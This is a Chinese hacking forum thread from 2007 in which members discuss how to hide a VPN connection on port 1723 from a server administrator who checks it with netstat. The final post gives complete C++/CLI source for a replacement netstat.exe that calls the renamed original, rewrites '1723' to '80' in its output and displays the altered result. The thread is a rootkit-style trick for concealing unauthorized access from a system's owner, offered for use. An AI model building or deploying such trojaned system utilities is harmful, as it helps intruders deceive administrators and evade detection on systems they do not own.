[讨论]VPN的1723端口隐藏求救

独孤依人

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 319
精华: 12
积分: 4062
阅读权限: 100
性别: 男
在线时间: 941 小时
注册时间: 2006-4-22
最后登录: 2009-7-1

发短消息
加为好友
当前离线

楼主大中小发表于 2007-8-12 01:22 只看该作者

[讨论]VPN的1723端口隐藏求救

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
议题作者：独孤E人

一直来用VPN，有个问题一直没有解决，那就是我们连上VPN的时候，只要在服务器netstat -na，然后看谁连接了1723端口，这样就被发现了。

那么，我们可不可以把这个端口给隐藏起来，很遗憾，我找了很多资料，也下载了所谓的端口隐藏器，测试后都没有效果。

后来，我想到把VPN这个端口改成其它的端口，比如说8080等，也减少管理员的怀疑，但是也没有实现，网络没有相关资料，修改配置文件也未果。在我的意识里，VPN和端口应该像IIS的80端口一样，服务端改了，客服端也应该改。

最后，我想，是不是可以通过端口复用技术来实现隐藏，因为做为一个Web服务器，如果把端口复用到80,管理员到死也不会想到是个VPN在连接。

另附邪八相关资料两篇：
http://forum.eviloctal.com/read- ... d-%D2%FE%B2%D8.html
隐藏Rootkit端口的工具测试无效，好像只能隐藏Rootkit的端口
http://forum.eviloctal.com/read- ... d-%D2%FE%B2%D8.html
我想问的是，用VPN连接的时候如何躲避管理员用netstat -na查出来。
最后，感谢每一位参于讨论的朋友，不管结果如何！

We are not the only ones,but we will try to be the best!

TOP

独孤依人

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 319
精华: 12
积分: 4062
阅读权限: 100
性别: 男
在线时间: 941 小时
注册时间: 2006-4-22
最后登录: 2009-7-1

发短消息
加为好友
当前离线

沙发大中小发表于 2007-8-12 01:44 只看该作者

占位回复，感谢毒药提供思路，自写netstat替换。大牛们有更好的思路的继续讨论。

We are not the only ones,but we will try to be the best!

TOP

独孤依人

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 319
精华: 12
积分: 4062
阅读权限: 100
性别: 男
在线时间: 941 小时
注册时间: 2006-4-22
最后登录: 2009-7-1

发短消息
加为好友
当前离线

椅子大中小发表于 2007-8-12 01:55 只看该作者

剑客兄弟在毒药基础上的思路：
先把netstat 重命名，然后写个程序!参数给NETSTAT 一样!程序的名字改成NETSTAT ,等管理员执行的时候,就把参数传给真的NETSTAT执行.然后把返回的信息写进一个文件中.然后查询文件!有你的端口就删掉那一行!再回显出来!

We are not the only ones,but we will try to be the best!

TOP

菩提树

晶莹剔透§烈日灼然

Rank: 1

帖子: 5
精华: 0
积分: 6
阅读权限: 40
性别: 男
在线时间: 20 小时
注册时间: 2007-8-11
最后登录: 2009-5-20

发短消息
加为好友
当前离线

板凳大中小发表于 2007-8-12 10:37 只看该作者

值得讨论的问题``你自己都说了``好像最好的办法也只有端口复用了`~!!!

TOP

zshoucheng

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 239
精华: 12
积分: 6173
阅读权限: 100
性别: 男
来自: gd
在线时间: 1273 小时
注册时间: 2006-5-19
最后登录: 2009-4-21

发短消息
加为好友
当前离线

地板大中小发表于 2007-8-12 16:16 只看该作者

楼主昨天找我的时候和我谈了下基本思路就是自写netstat,
并对使用 "-an" 或 "-na" 参数时做点手脚
当时的思路就是:
1.netstat [参数] >c:\port.txt
2.对c:\port.txt进行处理(替换掉1723)
3.type c:\port.txt
但若管理员使用 "-a" 或 "-n" 等参数时还会露出马脚

今天又想到了一个更邪恶更完美的办法,
不管使用什么参数都对c:\port.txt内容中1723进行替换
C++/CLI实现代码如下:

复制内容到剪贴板

代码:

#include "stdafx.h"

#include <stdlib.h>

using namespace System;

using namespace System::IO;

using namespace System::Runtime::InteropServices;



int main(array<System::String ^> ^args)

{

  String ^cmd = nullptr;

  for(int i=0;i<args->Length;i++)

  {

    cmd += " " + args[i];

  }

  String ^logFile = Environment::SystemDirectory + "\\port.log";

  cmd = cmd->Format("stat.exe{0} >{1}",cmd,logFile); //请将系统原来的netstat.exe改名为stat.exe

  char* cstr = static_cast<char*>(Marshal::StringToHGlobalAnsi(cmd).ToPointer()); //String->char*

  system(cstr);

  TextReader ^tr = gcnew StreamReader(logFile);

  String ^content = tr->ReadToEnd();

  tr->Close();

  content = content->Replace("1723","80 "); //之所以"80 "是为了输出端口信息时能够对齐

  TextWriter ^tw = gcnew StreamWriter(logFile);

  tw->Write(content);

  tw->Close();

  cmd = cmd->Format("type {0}",logFile);  

  cstr = static_cast<char*>(Marshal::StringToHGlobalAnsi(cmd).ToPointer());

  system(cstr);

  File::Delete(logFile);

  return 0;

}